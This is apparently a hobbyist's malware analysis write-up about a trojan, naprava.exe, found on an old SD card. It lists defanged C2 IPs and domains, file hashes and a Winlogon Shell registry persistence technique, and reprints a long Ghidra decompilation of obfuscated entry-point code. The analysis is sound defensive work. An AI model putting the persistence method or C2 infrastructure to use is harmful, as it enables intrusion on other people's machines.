I served a two year ecclesiastical mission in the Republic of Moldova from 2011 to 2013 for the Church of Jesus Christ of Latter-day Saints. I recently dug through boxes of old memories and found SD cards containing photos and videos from those two years in Moldova.
However, after inserting them into my Linux machine’s SD card reader, I found that one of them contained multiple sub-folders holding Windows executables with odd or Russian-sounding names. These are not part of the SanDisk default directory structure, nor part of the Canon digital camera software directory structure.
File Analysis
../eksplozivna/naprava.exe
Analysis
I uploaded the file to AnyRun: https://app.any.run/tasks/9a5b4267-cc01-40ff-bdef-eff6b1c702a8
The exe invoked svchost.exe and loaded the following DLLs:
- ntdll.dll
- wow64.dll
- wow64win.dll
- wow64cpu.dll
- kernel32.dll
- KernelBase.dll
- apphelp.dll
- sechost.dll
- rpcrt4.dll
- bcrypt.dll
- ucrtbase.dll
All DLLs are legitimately signed.
The exe replaces the legitimate svchost with a modified version. It then writes a value named Shell to the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon. This is a big red flag: the Winlogon Shell value names the program launched at user logon, so it looks like the malware is hooking a reverse shell into the logon actions to gain persistence.
The program then uses the malicious svchost process to drop another file: cbzvl.exe
The program uses the WinAPI to query system information. It then creates a UDP connection to 45.144.3[.]149:6600 (peer.pickeklosarske[.]ru).
- 45.144.3[.]149
- 1/94, https://www.virustotal.com/gui/ip-address/45.144.3.149/relations
- HK non-cloud IP that has been serving the same two C2 domains for years:
- peer.pickeklosarske[.]ru
- 5/94, https://www.virustotal.com/gui/domain/peer.pickeklosarske.ru
- known C2
- jebena.ananikolic[.]su
- 9/94, https://www.virustotal.com/gui/domain/jebena.ananikolic.su
- known C2
- peer.pickeklosarske[.]ru
The connection sends 21 bytes. Nothing decipherable is visible in the pcap.
Another UDP connection is made to 193.166.255[.]171:6600 (teske.pornicarke[.]com) to send another 21 bytes. Additional 21-byte outbound UDP packets are also present.
- 193.166.255[.]171
- 1/94, https://www.virustotal.com/gui/ip-address/193.166.255.171
- Finnish IP that serves a very large number of domains. Possibly a legitimate malware sinkhole — or that claim may simply be a false comment left by a malicious user.
- teske.pornicarke[.]com
- 7/94, https://www.virustotal.com/gui/domain/teske.pornicarke.com
- Known as a C2 for a UDP-based worm since 2010.
- 224.0.0[.]252
- 0/94, https://www.virustotal.com/gui/ip-address/224.0.0.252
- The pcap payload shows an ISATAP IPv6 request. Not malicious.
- 208.100.26[.]242
- 4/94, https://www.virustotal.com/gui/ip-address/208.100.26.242
- Known C2 server.
Below is the hash analysis of the files:
- naprava.exe
- SHA256:c1f24e1e78848b9ec2ef0920aa7a4ffed597c2e8cb4dcf221531e411a3058e30
- 68/73, https://www.virustotal.com/gui/file/c1f24e1e78848b9ec2ef0920aa7a4ffed597c2e8cb4dcf221531e411a3058e30
- Detected as a trojan/worm/PUA belonging to the Palevo, Rimecud, and Bredolab malware families.
- cbzvl.exe
- Same as naprava.exe
AnyRun shows the session also reached out to the following IP addresses:
- 184.30.131[.]245
- 0/94, https://www.virustotal.com/gui/ip-address/184.30.131.245
- German Akamai IP; serves DigiCert and RapidSSL content.
- 52.149.20[.]212
- 0/94, https://www.virustotal.com/gui/ip-address/52.149.20.212/relations
- Microsoft update server. Not malicious.
Ghidra analysis of the malware shows the following decompiled code:
/*
 * Ghidra decompilation of naprava.exe's entry point, as pasted into the
 * write-up. Reading notes for analysts; this is decompiler output, not
 * compilable C:
 *  - undefined/undefined2/undefined4, uint, ushort, byte, int3 and the
 *    CONCATxx/SUB42/CARRY4/SBORROW4 pseudo-ops are Ghidra notation; the
 *    DAT_/FUN_/s_ symbols are auto-generated labels.
 *  - Locals named in_EAX, extraout_* and unaff_* are Ghidra's names for
 *    register values it could not trace to any definition, i.e. the
 *    function reads registers left over from whatever ran before it.
 *    Comparisons and arithmetic on them below carry no recoverable meaning.
 *  - The body repeatedly calls strlen()/puts() on nonsense string literals
 *    ("Rscmc Clf, Nqf. Gau" etc.), usually discarding the result, and calls
 *    GetSystemTime/GetTickCount/QueryPerformanceCounter/GetOEMCP/GetACP/
 *    GetStartupInfoA whose results feed only ad-hoc comparisons and writes
 *    to DAT_ globals. NOTE(review): this reads as junk/padding code of the
 *    kind produced by a packer or obfuscation stub — the registry and
 *    network behaviour described in the prose is not visible in this
 *    function and presumably lives in the unresolved callees FUN_00408ce9,
 *    FUN_00407736, FUN_004078aa, FUN_00408800 and FUN_00408f23; confirm by
 *    analysing those.
 *  - Control never returns: the final call is ExitProcess(0).
 */
void entry(void)
{
int in_EAX;
DWORD DVar1;
size_t sVar2;
LPSYSTEMTIME p_Var3;
int iVar4;
BOOL BVar5;
uint uVar6;
UINT UVar7;
char extraout_CL;
ushort extraout_CX;
short extraout_CX_00;
undefined4 extraout_ECX;
uint extraout_ECX_00;
undefined extraout_DL;
uint extraout_EDX;
undefined4 extraout_EDX_00;
undefined4 extraout_EDX_01;
uint extraout_EDX_02;
char *extraout_EDX_03;
uint extraout_EDX_04;
int extraout_EDX_05;
uint extraout_EDX_06;
uint extraout_EDX_07;
char *extraout_EDX_08;
char *extraout_EDX_09;
uint extraout_EDX_10;
byte bVar8;
ushort uVar9;
uint unaff_EBX;
ushort uVar10;
uint unaff_ESI;
LPSYSTEMTIME p_Var11;
uint uVar12;
uint unaff_EDI;
undefined4 uVar13;
char cVar14;
bool bVar15;
char *pcVar16;
char *pcVar17;
char *pcVar18;
uint local_78;
LARGE_INTEGER local_70;
_SYSTEMTIME local_68;
uint local_58;
char *local_54;
uint local_50;
_SYSTEMTIME local_4c;
uint local_3c;
_SYSTEMTIME local_38;
undefined2 local_28;
ushort local_24;
_SYSTEMTIME local_20;
char *local_10;
byte local_c;
byte local_b;
char local_a;
undefined local_9;
LPSYSTEMTIME local_8;
local_8 = (LPSYSTEMTIME)0xfff5abd4;
/* in_EAX is never assigned in this function: it is the EAX value inherited
   from whatever ran before the entry point. */
if (in_EAX != -0x6f40b600) {
GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a014);
unaff_EBX = CONCAT22((short)(unaff_EBX >> 0x10),CONCAT11(local_c,(char)unaff_EBX));
DAT_0040a0cc = unaff_EDI;
}
GetSystemTime(&SYSTEMTIME_0040a0d0);
/* Result discarded; the same holds for every other bare strlen() call below. */
strlen("Rscmc Clf, Nqf. Gau");
DAT_0040a058 = (undefined2)unaff_EBX;
uVar12 = DAT_0040a0e0;
GetSystemTime((LPSYSTEMTIME)&DAT_0040a080);
if (DAT_0040a0cc != unaff_ESI) {
local_8 = (LPSYSTEMTIME)((int)local_8 + uVar12);
}
p_Var11 = (LPSYSTEMTIME)(unaff_ESI & (uint)local_8);
local_8 = (LPSYSTEMTIME)0x114060;
DVar1 = GetTickCount();
if (DVar1 != 0) {
unaff_EBX = (uint)(char)(unaff_EBX >> 8);
local_10 = (char *)0x0;
DAT_0040a05a = extraout_CX;
}
cVar14 = local_8 < DVar1;
local_8 = (LPSYSTEMTIME)((int)local_8 - DVar1);
uVar13 = CONCAT22((short)(unaff_EDI >> 0x10),DAT_0040a0e4);
GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a014);
GetSystemTime(&local_20);
local_b = (byte)(unaff_EBX >> 8);
DAT_0040a0c7 = (DAT_0040a0c7 - extraout_CL) - cVar14;
/* Stored value is overwritten a few lines below (DAT_0040a008 = uVar13)
   without being read in between. */
DAT_0040a008 = puts("Mojjha Phdr. Ygpa");
_DAT_0040a0e8 = _DAT_0040a0e8 + -0xbe9620;
DAT_0040a000 = 0;
puts("Fbwdc Ymrwoelrx");
GetOEMCP();
DAT_0040a008 = uVar13;
strlen("Oyycv La, Jjpfwl");
DAT_0040a0e0 = DAT_0040a0e0 | extraout_EDX;
pcVar16 = "Lpdm, Rgcmnbe Wmslc";
sVar2 = strlen("Lpdm, Rgcmnbe Wmslc");
if (((LPSYSTEMTIME)local_10 == p_Var11) &&
(unaff_EBX = unaff_EBX + (-(uint)(local_10 < p_Var11) - sVar2),
((uint)pcVar16 & (uint)p_Var11) == 0)) {
local_10 = (char *)unaff_EBX;
}
sVar2 = strlen("Qlmqipqh Gaxmdj Qwl");
local_8 = (LPSYSTEMTIME)((uint)local_8 | 0x244);
_DAT_0040a0e8 = extraout_EDX_00;
if ((short)sVar2 != DAT_0040a0e6) {
p_Var3 = &local_20;
GetSystemTime(p_Var3);
if (p_Var3 == (LPSYSTEMTIME)0x0) {
unaff_EBX = unaff_EBX & 0xffff0000;
_DAT_0040a0ec = extraout_ECX;
}
unaff_EBX = CONCAT22((short)(unaff_EBX >> 0x10),local_28);
}
GetSystemTime(&local_38);
p_Var3 = &local_4c;
local_3c = (uint)p_Var11;
GetSystemTime(p_Var3);
if ((DAT_0040a0c2 == (short)p_Var3) &&
(p_Var11 = local_8, _DAT_0040a0f4 = extraout_EDX_01, ((uint)p_Var3 & 0xaafae336) == 0)) {
DAT_0040a00d = DAT_0040a00d + -0x10;
p_Var3 = DAT_0040a0c8;
unaff_EBX = DAT_0040a0f0;
}
DAT_0040a0cc = extraout_ECX_00;
local_8 = p_Var3;
iVar4 = puts("Cjkh Kpgoft Mrl");
if (iVar4 == 0) {
local_10 = (char *)0x0;
DAT_0040a074 = 0xffffffff;
}
DAT_0040a0f8 = DAT_0040a0f8 ^ 0xffff;
pcVar16 = (char *)CONCAT31((int3)(unaff_EBX >> 8),DAT_0040a00e);
strlen("Enoutwjs Mngef Ybwg");
DAT_0040a060 = (char *)0x1d0;
local_10 = (char *)((uint)local_10 & extraout_EDX_02);
strlen("Jrkxwqmylr, Tetmf");
pcVar17 = "Ixjyep. Ths, Tcfbe";
strlen("Ixjyep. Ths, Tcfbe");
local_54 = pcVar17;
/* FUN_00408ce9 is not shown in the write-up; its return value decides the
   'P' branch directly below. */
local_24 = FUN_00408ce9(pcVar17,extraout_DL);
pcVar17 = local_10;
DAT_0040a0fc = 0;
if ((char)local_24 == 'P') {
BVar5 = QueryPerformanceCounter((LARGE_INTEGER *)&DAT_0040a090);
local_24 = (ushort)BVar5;
_DAT_0040a100 = 0x2c3468;
pcVar16 = (char *)~(uint)pcVar16;
GetSystemTime((LPSYSTEMTIME)&DAT_0040a080);
}
local_3c = (uint)p_Var11;
GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a014);
local_b = 0;
puts("Homaqmdy Rup Ox");
iVar4 = puts("Crbw, Kcfsu, Qsqy");
if ((iVar4 != 0) && (DAT_0040a05a = DAT_0040a05a & (ushort)pcVar16, (int)local_8 <= (int)p_Var11))
{
local_a = -1;
}
strlen("Sjrk. Yg. Wgkqfp");
local_50 = 0;
iVar4 = puts("Gdhthyy Ygcp Gobqc");
if (local_a == (char)iVar4) {
bVar15 = CARRY4((uint)p_Var11,(uint)pcVar17);
p_Var11 = (LPSYSTEMTIME)((int)p_Var11 + (int)pcVar17);
pcVar16 = extraout_EDX_03 + (uint)bVar15 + CONCAT31((int3)((uint)pcVar16 >> 8),local_c);
local_58 = 0;
if (pcVar17 == extraout_EDX_03) {
_DAT_0040a0bc = 0x2d2be4;
}
}
local_50 = 0x39614c;
p_Var3 = &local_68;
GetSystemTime(p_Var3);
if (p_Var3 == (LPSYSTEMTIME)0x0) {
DAT_0040a0c8 = (LPSYSTEMTIME)0x26c;
local_54 = pcVar17;
local_24 = (ushort)pcVar16;
}
_DAT_0040a104 = pcVar17;
pcVar18 = "Brlptjuj. Lpiul";
strlen("Brlptjuj. Lpiul");
local_8 = (LPSYSTEMTIME)((int)local_8 - (int)pcVar18);
/* FUN_00407736 is not shown in the write-up; it is called three times in
   this function, always with a single string-like argument. */
FUN_00407736("Mpspyof. Q");
GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a108);
GetTickCount();
if (local_b != (byte)pcVar16) {
_DAT_0040a0fa = 0xe8;
local_8 = (LPSYSTEMTIME)(((int)local_8 - extraout_EDX_04) - (uint)(local_b < (byte)pcVar16));
DAT_0040a0e0 = extraout_EDX_04;
}
local_c = 0x2c;
if ((char)((uint)pcVar16 >> 8) == ',') {
puts("Qqrlmn. Rfyag, Gur");
}
local_8 = (LPSYSTEMTIME)((int)local_8 + 0x33714c);
local_50 = local_50 - 0xc4faa0;
_DAT_0040a14c = _DAT_0040a14c & (ushort)local_58;
DAT_0040a074 = 0;
strlen("Jnywjsxv Ycr Twdygo");
QueryPerformanceCounter(&local_70);
/* NOTE(review): s_Peys,_Fk,_Xjffdr_0040a158 appears to be a single Ghidra
   string label whose name contains commas (compare the one-argument calls
   with "Mpspyof. Q" and s_Wxml._Gyak_0040a180), not three arguments. */
FUN_00407736(s_Peys,_Fk,_Xjffdr_0040a158);
iVar4 = puts("Yyhlxc, Tqoa Tekwhr");
if (iVar4 != DAT_0040a0a4) {
puts("Yupo Rpi Pjvlt, Nxo");
pcVar16 = DAT_0040a060;
}
local_50 = local_50 & 0x1517a4;
GetTickCount();
uVar10 = local_24;
local_58 = local_58 - 0xdd5f30;
DAT_0040a0fe = 1;
uVar12 = CONCAT22((short)((uint)p_Var11 >> 0x10),local_24);
cVar14 = '\x15';
DAT_0040a0c8 = (LPSYSTEMTIME)pcVar16;
uVar6 = puts("Etixxpcu Xua, Rcm");
if ((uVar6 != 0) && ((_DAT_0040a16c & uVar6) != 0)) {
_DAT_0040a14e = 0xe7f4;
local_58 = (uint)pcVar17 >> 0x18 | ((uint)pcVar17 & 0xff0000) >> 8 |
((uint)pcVar17 & 0xff00) << 8 | (int)pcVar17 << 0x18;
}
strlen("Krcjo, Ldtvhs Tcb");
puts("Jcjia Ewn, Qlhpq");
if (DAT_0040a170 == extraout_EDX_05) {
local_54 = pcVar16;
}
local_8 = (LPSYSTEMTIME)((int)local_8 + 0x96a3c0);
bVar8 = 0x60;
strlen("Xfhdu Nufd, Ajnx");
p_Var11 = local_8;
bVar15 = DAT_0040a0c6 < bVar8;
if (DAT_0040a0c6 == bVar8) {
bVar15 = 0xfffffe2f < local_58;
local_58 = local_58 + 0x1d0;
local_50 = (local_50 - 1) - (uint)bVar15;
DAT_0040a0e4 = 0xbae0;
local_24 = (ushort)cVar14;
bVar15 = local_24 < (ushort)pcVar16;
if (local_24 == (ushort)pcVar16) {
bVar15 = false;
}
}
DAT_0040a0ff = DAT_0040a0ff + -0x70 + bVar15;
/* Unresolved callee; not shown in the write-up. */
uVar6 = FUN_004078aa();
if (p_Var11 == (LPSYSTEMTIME)uVar6) {
strlen("Pjprvc Kbc. Pacgex");
}
puts("Wetujnfoun Epgj");
sVar2 = strlen("Ckp, Tvbv Woqkrvgy");
if (DAT_0040a074 == extraout_EDX_06) {
local_58 = (local_58 - 0x3a2b10) - (uint)(DAT_0040a074 < extraout_EDX_06);
local_24 = 1;
if (sVar2 != 0x9c6cb36d) {
local_a = -0x50;
}
}
local_54 = (char *)((uint)local_54 | 0x3c8);
_DAT_0040a0a8 = 0xa91030;
GetACP();
DAT_0040a174 = local_78;
UVar7 = GetOEMCP();
if ((DAT_0040a0c2 != extraout_CX_00) && ((UVar7 & 0xa3c0b358) == 0)) {
p_Var11 = (LPSYSTEMTIME)(extraout_EDX_07 >> 8 & 0xff);
}
DAT_0040a178 = uVar12;
iVar4 = puts("Rwvbvtfp. Sdcdt");
if (iVar4 == 0) {
local_78 = -local_78;
_DAT_0040a17c = SUB42(p_Var11,0);
}
local_24 = (ushort)local_78;
GetSystemTime(&local_38);
FUN_00407736(s_Wxml._Gyak_0040a180);
bVar8 = (byte)p_Var11;
uVar9 = CONCAT11(local_a,bVar8);
pcVar16 = extraout_EDX_08;
if ((uVar9 != uVar10) &&
(sVar2 = strlen("Hykkl Cah. Lhk. Kt"), pcVar16 = extraout_EDX_09, sVar2 == 0)) {
DAT_0040a18c = DAT_0040a18c + -1;
pcVar16 = local_10;
}
uVar12 = ~uVar12;
local_10 = pcVar16;
puts("Vdqejy Eeqgd Yleorx");
local_a = '\x01';
_DAT_0040a010 = local_78;
local_8 = (LPSYSTEMTIME)CONCAT22((short)((uint)p_Var11 >> 0x10),uVar9);
GetOEMCP();
cVar14 = bVar8 + (char)DAT_0040a074 + (local_c < bVar8);
QueryPerformanceCounter(&local_70);
_DAT_0040a17e = 1;
pcVar16 = "Lwilrw. Smxq, Mtg";
puts("Lwilrw. Smxq, Mtg");
bVar15 = DAT_0040a0e0 < local_78;
if (DAT_0040a0e0 != local_78) {
DAT_0040a0cc = extraout_EDX_10 & (uint)DAT_0040a060;
cVar14 = (char)local_54;
bVar15 = local_10 != (char *)0xffffffff;
if (!bVar15) {
DAT_0040a0cc = 0x68f130;
cVar14 = '\0';
}
pcVar16 = (char *)~(uint)pcVar16;
}
local_10 = local_10 + (-(uint)bVar15 - (int)pcVar16);
sVar2 = strlen("Kbwxyj Csqacui. Stp");
uVar6 = uVar12;
if (sVar2 == 0) {
cVar14 = (char)local_58;
uVar6 = uVar12 - local_58;
}
uVar10 = (ushort)uVar6;
cVar14 = (cVar14 - (char)local_10) - (sVar2 == 0 && uVar12 < local_58);
local_10 = (char *)0xdaea4;
puts("Myvilee, Gvixwh A");
GetTickCount();
local_3c = 0xffffffff;
pcVar16 = "Dyfd, Yannldh Toklr";
strlen("Dyfd, Yannldh Toklr");
/* Unresolved callee; not shown in the write-up. */
FUN_00408800((uint)pcVar16);
bVar8 = 0x34;
iVar4 = puts("Nspexe Yueomh Lh");
if (local_b == bVar8) {
cVar14 = (char)iVar4;
}
if (SBORROW4(local_50,0x3b4)) {
puts("Ydtiyt Rj, Jxkg Tmr");
}
DAT_0040a05a = DAT_0040a05a & 0x3430;
GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a108);
bVar8 = (byte)DAT_0040a190;
DAT_0040a0c5 = cVar14;
UVar7 = GetOEMCP();
if (UVar7 != 0) {
if ((UVar7 & 0x40) == 0) {
uVar10 = (ushort)DAT_0040a194;
local_9 = (undefined)(UVar7 >> 8);
}
bVar8 = bVar8 & (byte)local_3c;
}
puts("Tfqg Hafugk, Njltyh");
pcVar16 = "Vbix Iowmwtocmr X";
puts("Vbix Iowmwtocmr X");
if (local_24 == uVar10) {
pcVar16 = (char *)CONCAT22((short)((uint)pcVar16 >> 0x10),
CONCAT11(((char)((uint)pcVar16 >> 8) - bVar8) - (local_24 < uVar10),
(char)pcVar16));
}
DAT_0040a078 = &DAT_00414570 + (uint)(local_24 != uVar10 && local_24 < uVar10) + (int)DAT_0040a078
;
DAT_0040a0c4 = DAT_0040a0c4 + ' ';
local_54 = pcVar16;
GetACP();
GetSystemTime((LPSYSTEMTIME)&DAT_0040a19c);
DAT_0040a05a = DAT_0040a05a - 1;
/* Final unresolved callee before the process exits; not shown in the
   write-up. */
FUN_00408f23();
/* WARNING: Subroutine does not return */
ExitProcess(0);
}
Conclusion
The malware naprava.exe gathers system information, installs a reverse shell for persistence via the Winlogon Shell registry value, and then sends information to C2 servers.